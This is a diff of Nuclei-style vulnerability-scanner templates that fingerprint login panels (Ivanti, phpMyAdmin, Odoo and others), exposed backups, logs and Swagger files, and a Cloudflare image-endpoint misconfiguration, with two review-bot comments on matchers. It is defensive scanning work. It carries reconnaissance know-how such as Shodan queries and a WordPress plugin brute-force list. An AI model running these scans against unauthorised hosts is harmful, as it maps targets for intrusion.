# digest: 4b0a00483046022100947f00fcac2bdcc793453ed15706359afde89947675258107183adb0f5b622f7022100e9295654f6ab5e2e2c8f63f28b7e99923b92cca82532de2b9314927aecaf52c6:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502206418902cc87923995e4a87a3036d1a138bae03cb012fde34e44df55ce4504dac022100cac92b3dee719aff4f1d10544579c719236bf9dca63006ef5e0e0741aee209b2:922c64590222798bb761d5b6d8e72950


@ -11,7 +11,8 @@ info:
vendor: gotify
product: server
verified: true
shodan-query: http.title:"Gotify"
shodan-query: "http.title:\"Gotify\""
max-request: 1
tags: panel,gotify,login,detect
http:
@ -32,4 +33,4 @@ http:
group: 1
regex:
- '"version":"([0-9.]+)"'
# digest: 4b0a00483046022100c306600c5a3f75ebdbc6d89aeb4a9042c616f870d869819424686889a568b7880221008c14b6498f5d7f935e09fe01a8f4bda2c761f2692a59202766cb798135336ae9:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402204ed0fc61c5fdaec5869843788c59849c687bfe8b39891df7eab06b029e516749022055341de709d14d202015b389e25139b06ed1398ab952f6a2a39cd2ecf6a343de:922c64590222798bb761d5b6d8e72950


@ -13,9 +13,9 @@ info:
cvss-score: 5.3
cwe-id: CWE-200
metadata:
max-request: 2
vendor: grails
product: grails
max-request: 2
tags: grails,panel
http:
@ -34,4 +34,4 @@ http:
words:
- "Sorry, remote connections ('webAllowOthers') are disabled on this server"
negative: true
# digest: 4a0a0047304502204ea638d90bf728298450d4bf071d113ae80087d4e5001d971617212faf1e375c022100dac85d19d2f65956875f904ce9e025a55c229cae307af3e03fa7708c190b8ef6:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100f7857a61a4ccdef275c890a466396f0aef331e21c33e1ab4e86f6cd2c4f3c4a4022025d9b94b715dc2b8c625ba3a8111008a7f2039dd829d7b2bef2414ba73e51ced:922c64590222798bb761d5b6d8e72950


@ -9,7 +9,8 @@ info:
- https://www.haivision.com/
metadata:
verified: true
shodan-query: http.title:"Haivision Gateway"
shodan-query: "http.title:\"Haivision Gateway\""
max-request: 1
tags: panel,haivision,login,detect
http:
@ -23,4 +24,4 @@ http:
- 'status_code == 200'
- 'contains_any(body, "<title>Haivision Gateway", "content=\"Haivision Gateway")'
condition: and
# digest: 4b0a0048304602210086238eba9398bb797b00f86ef36db758f4962c0d8247070cf8b2554bdbc4b649022100c49ebd06f35893af713c00909b8f98abbae0f3ab6230d799ad0acf6147196e68:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402200b774f9123ccefe48635e129de64e264ee5b5b5882a63118c8e59935903bd895022057bd039a93248ba6b03b8c1078549b1e74b89f06fef7cc311d719dc909801370:922c64590222798bb761d5b6d8e72950


@ -9,9 +9,9 @@ info:
- https://www.haivision.com/
metadata:
verified: true
shodan-query: http.title:"Haivision Media Platform"
shodan-query: "http.title:\"Haivision Media Platform\""
max-request: 1
tags: panel,haivision,login,detect
http:
- method: GET
path:
@ -23,4 +23,4 @@ http:
- 'status_code == 200'
- 'contains_any(body, "<title>Haivision Media Platform", "content=\"Haivision Network Video")'
condition: and
# digest: 4a0a00473045022100852a82de658ce3156eed4bb9e4faf88dd4e709f258d2f188cd2aaa6f07d6e85a022079da3770440c2b448ce933600e28d1644f9a9747c3008c9e3b7f2d1f978f9e98:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402205b887d409f93bb8c6bca75ccede4fb4ede2c9c827e9b47af66ef16486efe5bed022013582e7154224d6596931d51c61ce2b4c11d03fc9682a4b29f4731c8cd797b21:922c64590222798bb761d5b6d8e72950


@ -10,7 +10,8 @@ info:
- https://www.ibm.com/docs/en/odm/8.5.1?topic=console-tutorial-getting-started-decision-center-enterprise
metadata:
verified: true
shodan-query: html:"Decision Center Enterprise console"
shodan-query: "html:\"Decision Center Enterprise console\""
max-request: 1
tags: panel,ibm,login,detect,decision-center
http:
@ -30,4 +31,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a00473045022100c1586e66a4f5b442e8b98fc0197d38db06f862c0aa724aad823686560f8af3150220651109acecc6891e0802e326f21c5261822dbc69bee767c5e4eb04cd73c0026e:922c64590222798bb761d5b6d8e72950
# digest: 4a0a004730450221008667c30c6129e740f22587180d65bef7ea8c9bc5e42073143338ea019a73840d022004dfe32d460d9554f364fc00d8db42df22960b4dbfde97ec9101a158366ad22e:922c64590222798bb761d5b6d8e72950


@ -10,7 +10,8 @@ info:
- https://www.ibm.com/docs/en/odm/8.12.0?topic=overview-introducing-rule-execution-server
metadata:
verified: true
shodan-query: title:"Rule Execution Server"
shodan-query: "title:\"Rule Execution Server\""
max-request: 1
tags: panel,ibm,login,detect,decision-server
http:
@ -30,4 +31,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a0047304502204d00e79a36864310511d3945c877939d641c2eacd7d408a2786aa413851bacd0022100f12605169ab70c9beb895a8691d7cb6f2ca099f3c6bdc7ffe6c2f7b818010135:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100f8a6779c2c863e990a8f3761c1fbc8d9a2aac9c60e69c8feb80a9b48a5660cf102207f75f60642c2257b39595c992440af15edf913738771b226230ebd0d27350410:922c64590222798bb761d5b6d8e72950


@ -10,7 +10,8 @@ info:
- https://www.ibm.com/docs/en/odm/8.12.0
metadata:
verified: true
fofa-query: title="Decision Center | Business Console"
fofa-query: "title=\"Decision Center | Business Console\""
max-request: 1
tags: panel,ibm,login,detect,decision-center
http:
@ -28,4 +29,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a00473045022100d52dbff62d09aa1893a69601b6ebddcee476872b7bb74d935c4e313e8d76578e0220590a89cfb7fc87044c7c7dd5e7def60b1c02374a7671d2affc6a164a3045e4a8:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100b3e217aca2f0e7f4749d018a3aa54ce7d31b691b0feace4be2ea8945691b24a002210092adc4f4e4095474a2915ebe62b11db7981f79fe08a1ce086adc6ddfd2c7811a:922c64590222798bb761d5b6d8e72950


@ -10,10 +10,10 @@ info:
- https://www.ivanti.com/products/connect-secure-vpn
metadata:
vendor: ivanti
product: connect_secure
product: "connect_secure"
verified: true
max-request: 1
shodan-query: title:"Ivanti Connect Secure"
max-request: 2
shodan-query: "title:\"Ivanti Connect Secure\""
tags: panel,connectsecure,login
http:
@ -35,4 +35,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a00473045022100d585f9e252400d8b89e35a904465bc72b1832386ab12f0554abcefd5a8be293e02202a923fe7c0fc9e7ee34ae5f72b28a5683ab136b9a664779fc942b61847b84a52:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100c4feca263103f90d4e4077e98702f3dd3dbf5c455ecfb5ed45115b96ad11372c022100ba71de0184707063914de8dee85d4e4930735f2609448a0470e38c0198003b7a:922c64590222798bb761d5b6d8e72950


@ -10,12 +10,11 @@ info:
- https://www.juniper.net/documentation/us/en/software/jweb-ex/jweb-ex-application-package/topics/concept/ex-series-j-web-interface-overview.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
max-request: 2
max-request: 1
verified: true
shodan-query: http.title:"Juniper Web Device Manager"
shodan-query: "http.title:\"Juniper Web Device Manager\""
tags: panel,juniper,vpn,login
http:
@ -43,4 +42,4 @@ http:
group: 1
regex:
- 'var modelphpStr = "(.*?)";'
# digest: 4b0a00483046022100fc6761f1e20dc648ed664ad95d12ebbf947321c37644528bc30edc2a7bc4918d0221009f32657ac7c105b55a5dbe72bb6f2d59f11c4f73563b60a96c5153f99d25b636:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502205ca23f303d8fa1ef26270300c55737695329a18b419a0eaa9c633ec3d476a6b902210089ea66b95ddb52fa15accc8bebc0824d44dc509c97674017cf72d1a0ba8c0997:922c64590222798bb761d5b6d8e72950


@ -10,13 +10,12 @@ info:
- https://github.com/provectus/kafka-ui
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0
cwe-id: CWE-200
metadata:
vendor: provectus
product: ui
platform: kafka
max-request: 1
max-request: 2
tags: panel,kafka,apache,detect
http:
@ -45,4 +44,4 @@ http:
group: 1
regex:
- '"v([0-9.]+)"'
# digest: 490a004630440220120fd70d830d5673b6694bc74d5d5cdd0f17420aba4ae2000532dbcb795c6584022001816294148c66bde9fe384d304fd6f1b4bbedafc160454c3f9e0b5183f4e601:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502210091554843ef5d12adad3dd9e9d9ba5b82adc7a34ba448aaf4e12449bad284693e022034ed2d535005bac5972abee730948bb14439734f919d1b516f886b50ff402038:922c64590222798bb761d5b6d8e72950


@ -37,9 +37,10 @@ http:
- "alt=\"Keycloak"
- "kc-form-buttons"
- "/keycloak/img/favicon.ico"
- "/admin/keycloak/"
condition: or
- type: status
status:
- 200
# digest: 4a0a00473045022100ce99a9168d9735401c84081a0b8c389cebe54d781b5616f4d42390b7b920373a02206394e01504f7c25820d9154260d135c341af22fd6e392b37412ecbd99b9403bd:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100dd6221af8f8b9f571a28611b54d652f7568da86dce1654fa1a73962e720bf2cf022100ed7bd96937ba0a702f5889f0827638671d3ffbd3e98bba852bd274542e59ae0f:922c64590222798bb761d5b6d8e72950


@ -9,7 +9,8 @@ info:
- https://kopano.com/
metadata:
verified: true
shodan-query: http.title:"Kopano WebApp"
shodan-query: "http.title:\"Kopano WebApp\""
max-request: 1
tags: panel,kopano,login,detect
http:
@ -33,4 +34,4 @@ http:
group: 1
regex:
- '\?kv([0-9.]+)"'
# digest: 4a0a0047304502205ae240e238fffb87a0154ac0e19299328e5fd7f4e02f7cd8b5e0c74e304c8166022100ec2e323a3aa419e061a0504a4864efde49aa02f6272eb5b8c511960367a042e1:922c64590222798bb761d5b6d8e72950
# digest: 490a004630440220499c97ef6976f50be4391e8eeb0ddfeb3fcbe37bec5a7fe24d71c473e6b3d673022070949daf15a245428269d09199e9f2377b400261229944d98137f800b4e0f3a8:922c64590222798bb761d5b6d8e72950


@ -10,7 +10,8 @@ info:
- https://github.com/linagora/linshare
metadata:
verified: true
shodan-query: http.title:"LinShare"
shodan-query: "http.title:\"LinShare\""
max-request: 3
tags: panel,linshare,login,detect
http:
@ -30,4 +31,4 @@ http:
- 'status_code == 200'
- 'contains_any(body, "<title>LinShare", "x-ng-app=\"linshareAdminApp")'
condition: and
# digest: 4a0a0047304502207dcbdcd3215abf97fd2c12ef382bf488ddfa0f31ff0f717491fd3b0bf6bd9368022100b838aab3468abf4fe5755bfdb54b4a238263bda36c0ea794d661efa2b18880f8:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100ca5993c797cf75bbaa9653d71b58a8c69d527adaceac8589f0e96b9e49c8d38f02207eac6b0a379abc14b4907532c15a5ad9f9f62ef6b0852286904753a93af8019c:922c64590222798bb761d5b6d8e72950


@ -2,20 +2,25 @@ id: odoo-panel
info:
name: Odoo - Panel Detect
author: DhiyaneshDK
author: DhiyaneshDK,righettod
severity: info
metadata:
vendor: odoo
product: odoo
verified: true
max-request: 1
shodan-query: title:"Odoo"
max-request: 2
shodan-query: "title:\"Odoo\""
tags: login,panel,odoo
http:
- method: GET
path:
- "{{BaseURL}}/web/login"
- "{{BaseURL}}"
stop-at-first-match: true
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
@ -23,8 +28,14 @@ http:
part: body
words:
- '<title>Odoo</title>'
- 'odoo.session_info'
- 'web.layout.odooscript'
condition: or
- type: word
part: body
words:
- 'Log in'
condition: and
- type: word
part: header
@ -34,4 +45,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a00473045022100a4ee6283d4c0264ea8d9ac9e56e2c948d50afbb650ac84735d4978ada4bfcdf802207a1bf2401f730d11a14cc03bea4d3e2ac98aae9ad05856f7a41359be3b31eda1:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502202c94e6e7ce327a1d5e088428410c9e0bb977cfd163434b7a8e449af58b032a9c0221009dbebd38cac6453fb54b396854eae6bcef87f5f70980bf2b82610cfb98fdcb54:922c64590222798bb761d5b6d8e72950
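Review bot: The body matcher on the literal `'Log in'` in the second hunk looks newly added, and under `matchers-condition: and` it can hide real instances from an asset inventory. The match is case-sensitive and English-only, so an Odoo login page served in another language would fail it even when `<title>Odoo</title>` or `odoo.session_info` is present. `condition: and` on a single-word list is also redundant. Consider dropping that matcher, or folding the string into the preceding `or` word list, since the Odoo-specific markers and the header matcher already identify the product. The page does not mark which lines are additions, so this reading relies on the hunk growing from 8 to 14 lines.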


@ -5,14 +5,14 @@ info:
author: righettod
severity: info
description: |
Passbolt login panel was detected.
Passbolt login panel was detected.
reference:
- https://www.passbolt.com/
metadata:
verified: true
shodan-query: http.title:"Passbolt | Open source password manager for teams"
shodan-query: "http.title:\"Passbolt | Open source password manager for teams\""
max-request: 1
tags: panel,passbolt,login
http:
- method: GET
path:
@ -31,4 +31,4 @@ http:
group: 1
regex:
- '(?i)v=([0-9a-z.-]+)'
# digest: 4b0a00483046022100cd46bf88248b5f3ddfbaf30d8f17602a0168b6080418f686067b8482f9b37b570221008b497e1c5529c20f6202974940db3d83ca0be3737bab1799bd727c314e17a142:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402207f1b9037354038919a4460781c2f126b5ca46c7d67c0af2aa6f9653d51573ce2022048ad39d72b06d3603428ca396cf315280273241fbf01fe026e55d2d9f9a4f964:922c64590222798bb761d5b6d8e72950


@ -7,13 +7,12 @@ info:
description: phpMyAdmin panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0
cwe-id: CWE-200
metadata:
shodan-query: "http.title:phpMyAdmin"
vendor: phpmyadmin
product: phpmyadmin
max-request: 12
shodan-query: http.title:phpMyAdmin
max-request: 13
tags: panel,phpmyadmin
http:
@ -46,4 +45,4 @@ http:
group: 1
regex:
- 'v=([a-z0-9-._]+)'
# digest: 490a0046304402203073d075e05bc85ce417b3db20f3c9b6c7a32c22768f7ad39c75ffa91712bb4d022006c2a3c1552f7209c345f11c66087db13eef087aff98dead27a5c4a6f0fa4f54:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402205a7d1860670db2b7c7fe2c51ee5bca11729bf56ee88e3194b9f7cb90959a3ad10220664c394c6cca2ebeceb2166bc8a9d4c78b949ac13ebd420bc441fc7a22adc6af:922c64590222798bb761d5b6d8e72950


@ -7,14 +7,13 @@ info:
description: Proofpoint Protection Server panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0
cwe-id: CWE-200
metadata:
product: "proofpoint protection server"
shodan-query: "http.favicon.hash:942678640"
verified: true
max-request: 1
max-request: 2
vendor: proofpoint
product: proofpoint protection server
shodan-query: http.favicon.hash:942678640
tags: panel,proofpoint,login,detect
http:
@ -41,4 +40,4 @@ http:
part: header
words:
- 'PPSAUTH='
# digest: 4a0a00473045022100da651ce3e96c872c09b0efeb7f24ce435691efb6047687fa2f980969c7d32add02206cedee1a6d93fb48ac0d8c6a50883823566a3fdc0b0946e3a3d17921b76ed292:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100a1b58b379feb7b3d65301bdfd4395652cad8294c5edae415ecc4d47669e3ad1a02207e32ff2739b36c0e05a467df6fbef59f1ef6c6383b4ec9a75dbc21729f14efae:922c64590222798bb761d5b6d8e72950


@ -5,9 +5,9 @@ info:
author: dadevel
severity: info
metadata:
max-request: 2
vendor: pulsesecure
product: pulse_connect_secure
max-request: 2
tags: pulse,panel
http:
@ -40,4 +40,4 @@ http:
part: body
regex:
- "(?i)<string>([^<]+)</string>"
# digest: 4a0a0047304502203aa1cb77ba86704bad2c198c7fbf07c028f96dfe80cb8d6860fbec949ba9b314022100dbe4fbc3fd5b5fb9a25b9f45063a4c986bbe786b109f9356b2da46be1eb8b4af:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100f823e5c127aced792ff96e8e9214476b414af4e1353f299d1e59d51b537e6fd3022100b1c6a628c41e09ad48d649a5dca0b9f6051955009d9de2338a4237d51322544b:922c64590222798bb761d5b6d8e72950


@ -9,7 +9,8 @@ info:
- https://www.rocket.chat/
metadata:
verified: true
shodan-query: http.title:"Rocket.Chat"
shodan-query: "http.title:\"Rocket.Chat\""
max-request: 1
tags: panel,rocketchat,login,detect
http:
@ -25,4 +26,4 @@ http:
- 'status_code == 200'
- 'contains_any(body, "<title>Rocket.Chat", "content=\"Rocket.Chat")'
condition: and
# digest: 490a00463044022012e5cbbf245707dd32c566958b4c6fa7a07f06f418139ec7a81026c1f90de09a0220096635ca065674713ac77f3b305157cbfba0635b3f6e7d7da94cf8ed3f1ac1e7:922c64590222798bb761d5b6d8e72950
# digest: 490a004630440220213f92e33c7b93bd760a281dff3427b796dcb4eed73ed550941fb16abddd89180220080a30ead625b8491cb47333aff0f5d45158897773064a2aeb1baddffe94683a:922c64590222798bb761d5b6d8e72950


@ -5,14 +5,15 @@ info:
author: righettod
severity: info
description: |
Sentry login panel was detected.
Sentry login panel was detected.
reference:
- https://sentry.io/
metadata:
vendor: sentry
product: sentry
verified: true
shodan-query: http.title:"Login | Sentry"
shodan-query: "http.title:\"Login | Sentry\""
max-request: 1
tags: panel,sentry,login
http:
@ -36,4 +37,4 @@ http:
group: 1
regex:
- '(?i)"current":\s*"([0-9a-z.-]+)"'
# digest: 4b0a00483046022100bc11bbc2da0eeaaeb02cfdf576e886aaad2dbc0fbf346c43f5d8242aafd24ac102210087c344fb3a27ea65932c1a1adbd8ede83fcc91914d7c39027ae096ec8cd72ac0:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100b04d058d31690931f321b078a2ac12a98dbfae03861caadbc878766143783e2902207291a26d57c10aaa7dfedba3b543e898aa150509733c646e144fcd58a5758175:922c64590222798bb761d5b6d8e72950


@ -9,10 +9,10 @@ info:
reference:
- https://www.truenas.com
metadata:
vendor: ixsystems
product: truenas
verified: true
max-request: 1
vendor: ixsystems
product: truenas
shodan-query: html:"TrueNAS"
tags: login,panel,truenas
@ -33,4 +33,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a00473045022100dd1d5fd20c54a80d0f7d2631323b4434a2da43d683ca143da2f976cf8ab372d702201c583fae3cb0276990d9ad033e8461d795c1c7eba84d733b30cb0b2a45e60d26:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100ece185971ecd556127979d86bf7200c50f67dfaf61bb545570d1df063fd788a2022100ddaefbef6ccd73cfd9d33ba6612bfab01cd89d1c688769cc5159cfee1588d464:922c64590222798bb761d5b6d8e72950


@ -5,11 +5,12 @@ info:
author: righettod
severity: info
description: |
Vista Web login panel was detected.
Vista Web login panel was detected.
reference:
- https://resa.aero/solutions-operations-facturation/vista-web/
metadata:
verified: true
max-request: 1
tags: panel,vistaweb,login
http:
@ -30,4 +31,4 @@ http:
group: 1
regex:
- 'v=([0-9.]+)'
# digest: 4b0a004830460221009afbf2bd9a3f5bfffe7e6d92b5b3f4423102532bd1114541c5258759f24bc380022100e1677ad6b53c0e42ddb24ee59efd95a0682281006b56d46e0fb15a195598ffda:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100e75b80b7677ce3d46ea55b865e0c89ab12384a99ff0b565ec6e4dd49f1090a3102207c7e6629206f24058e677de683d5e3a191e9b14095a37db1469d6bfe1d00ac7b:922c64590222798bb761d5b6d8e72950


@ -10,9 +10,9 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cwe-id: CWE-200
metadata:
max-request: 59
shodan-query: "http.title:\"swagger\""
verified: true
max-request: 57
shodan-query: http.title:"swagger"
tags: exposure,api,swagger
http:
@ -105,4 +105,4 @@ http:
group: 1
regex:
- " @version (v[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3})"
# digest: 4a0a00473045022100d3639a8b44e797aa3fc7cca0bb5778f14f0d9d59ab15483940be419fa21321fa02204cbbcd636969871ac6d8cea4cb7aada40b6938b1f3314f3c235d4a80a1550bbd:922c64590222798bb761d5b6d8e72950
# digest: 4a0a004730450220699b1c75442a856dcd0637850a4464835dd00335e1ec2f4345bebd359e25f9af022100e79a9981d9c1330730d4f4b9fe6a2785c38be6e2ee9ad19f1df3d38694a5f97d:922c64590222798bb761d5b6d8e72950


@ -10,7 +10,7 @@ info:
cvss-score: 5.3
cwe-id: CWE-200
metadata:
max-request: 1440
max-request: 1305
tags: exposure,backup
http:
@ -127,4 +127,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a004730450221009e9e29e2bc6fa477a5ef35e682ed0677d6cd6457e0516add7ba7b3657dea242c0220573cc11dd5d3c17b8bb3226a23ac6bfa501b1c7f5e337c1fdfe79e581abadeb9:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100a51f2952c9c24769da7d9ad5fa3f8ad2c01a800385052b494e5cf8b8cd2b0b2002210086e92de1a4bcde1fb7758917220ed3470e42201e239106f349d60c0e28d6452b:922c64590222798bb761d5b6d8e72950


@ -8,10 +8,9 @@ info:
reference: https://www.awstats.org/docs/awstats_setup.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0
cwe-id: CWE-200
metadata:
max-request: 3
max-request: 4
tags: config,exposure,awstats
http:
@ -36,4 +35,4 @@ http:
- type: status
status:
- 200
# digest: 4b0a00483046022100a1d5304bdbe5718f9bb640888a5db388a5558f54e61dd1b5154393c62febb940022100a7d26343bf553aacbf42a7d583dc4bb2d4222a7fe0d08eae43078c91e82029f2:922c64590222798bb761d5b6d8e72950
# digest: 4a0a004730450220627e9e39ded451b53e2044aebb66514409fa81010ab0676b9ac36403755c30110221009aeb142c34946a6588ea2a98ebfece9603c77169ee688104cc8e6408be7b3c0d:922c64590222798bb761d5b6d8e72950


@ -8,7 +8,7 @@ info:
reference:
- https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/roundcube-log-disclosure.json
metadata:
max-request: 12
max-request: 16
tags: exposure,logs
http:
@ -57,4 +57,4 @@ http:
- type: dsl
dsl:
- content_length
# digest: 4a0a0047304502210092febbf3f9906523788e68550f93dd10480ff15eb53ab20a8c452c482c7cd380022061f77b2b8a8ae9439fe60c5d02731b99246b700d7d38cac9608bced9885ba4a3:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100f29f0edc0fd1c21ddc672864cdd1b0e8f9b6bf2fd245e63e3a18e009f87dda4802210094fc7c7162920f3d1b9a810729c4ac860b27bb6b73a4fe837009758cf4ee4fae:922c64590222798bb761d5b6d8e72950


@ -5,7 +5,7 @@ info:
author: 0xcrypto
severity: info
metadata:
max-request: 98135
max-request: 100563
tags: fuzzing,bruteforce,wordpress
http:
@ -35,4 +35,4 @@ http:
regex:
- "===\\s(.*)\\s===" # extract the plugin name
- "(?m)Stable tag: ([0-9.]+)" # extract the plugin version
# digest: 4b0a00483046022100bc606e0746f263229a02d000cd84aafb581fcdf5d93f151e4de17e328f47291b022100a600a40ce1fbd7cab94ccc994cd355edf9dc15ed337d21d28b414705b5324161:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022011ffc9134eaa01b62eddcdbbc33af59e33613478dd206665d9f12d60ea4fe114022100a6845b777b51f0d3959d009a91f612b73b13c9a5dc6fe6d058bd37994d64fe6a:922c64590222798bb761d5b6d8e72950


@ -0,0 +1,40 @@
id: cloudflare-rocketloader-htmli
info:
name: Cloudflare Rocket Loader - HTML Injection
author: j3ssie
severity: low
description: |
The Rocket Loader feature in Cloudflare allow attackers to inject arbitrary HTML into the website. This can be used to perform various attacks such as phishing, defacement, etc.
reference:
- https://developers.cloudflare.com/speed/optimization/content/rocket-loader/enable/
metadata:
max-request: 1
verified: true
tags: misconfig,cloudflare,htmli
http:
- method: GET
path:
- "{{BaseURL}}/cdn-cgi/image/width=1000,format=auto/https://raw.githubusercontent.com/simple-icons/simple-icons/develop/icons/cloudflare.svg"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Cloudflare'
- '<svg'
- 'M16.5088 16.8447c.1475-.5068.0908-.9707-.1553-1.3154-.2246-.3164-.6045-.499-1.0615-.5205l-'
- '1475.5068-.0918.9707.1543 1.3164.2256.3164.6055.498'
condition: and
- type: word
part: header
words:
- 'image/svg+xml'
- type: status
status:
- 200
# digest: 4a0a0047304502203f1f9450ea215136ca621ee9dbedce3ae4455abcc8dd73db23c5e0cdde586076022100f02e51d462db656b75f00a878d4608aed164f4cc5492a86cb73fd88a1665a085:922c64590222798bb761d5b6d8e72950
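Review bot: The request on the `path` line goes to `/cdn-cgi/image/...`, which as far as I know is Cloudflare's image-transformation endpoint and not Rocket Loader, yet the `name`, `description` and `reference` all point at Rocket Loader, so whoever triages a hit will look at the wrong setting. The matchers establish only that the zone fetched an SVG from a third-party origin and served it from the target's hostname as `image/svg+xml`; I would word the description accordingly, for example `The zone's Cloudflare image transformation endpoint fetches images from arbitrary origins and serves them from the site's own hostname.`, and add a `remediation` line telling owners to limit transformation sources to their own origins. The long path-data strings under `words` depend on the `develop` branch of an external repository, so an edit to that icon would silently turn the template into a false negative; pinning the URL to a fixed commit avoids that. Minor: "allow attackers" should read "allows attackers".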


@ -10,8 +10,9 @@ info:
- https://github.com/thewhiteh4t/killcast/blob/ee81cfa03c963d47d3335770fcea2ca48bddeabf/killcast.py#L100C25-L100C43
- https://rithvikvibhu.github.io/GHLocalApi/#section/Google-Home-Local-API/Authentication
metadata:
shodan-query: "Chromecast"
verified: true
max-request: 1
shodan-query: Chromecast
tags: google,chromecast,detect
http:
@ -32,4 +33,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a004730450221009d996dd528a6470315f3ef08c7de657ec6203185d235eb7877324aeb51c17c29022078f0723a1a04cc66cea30f0a15c736c5701e1062d0d40436d5f177e847865396:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502206c214513406d47d4e688761e11149e983c02c3e47bdfa1f4d01fab2aa15ff11d0221009b017586aea846fc0befea354637be19778ec8c58b0fb2c49e2f28e65855dc2a:922c64590222798bb761d5b6d8e72950


@ -10,7 +10,8 @@ info:
- https://www.ibm.com/products/operational-decision-manager
metadata:
verified: true
fofa-query: icon_hash="707491698"
fofa-query: "icon_hash=\"707491698\""
max-request: 1
tags: ibm,decision-center,tech,detect
http:
@ -28,4 +29,4 @@ http:
- type: status
status:
- 200
# digest: 4b0a00483046022100a59aa313dd5de76ccd37ff23f84ea70c006cf6902d856db566f35dd35a4091250221008aa670d5443398d03af2bd250cf3d43d379ff8c32783e9f9de3bb9c7af63ad0e:922c64590222798bb761d5b6d8e72950
# digest: 490a004630440220145ded2786c1d6f03455e511dd78e011fec59080659837fcc214ab4d5fa13b930220173f1a21d9016bd6415376e6b6963b1964e29cc705c87c6b10ee14d6f0eeb176:922c64590222798bb761d5b6d8e72950
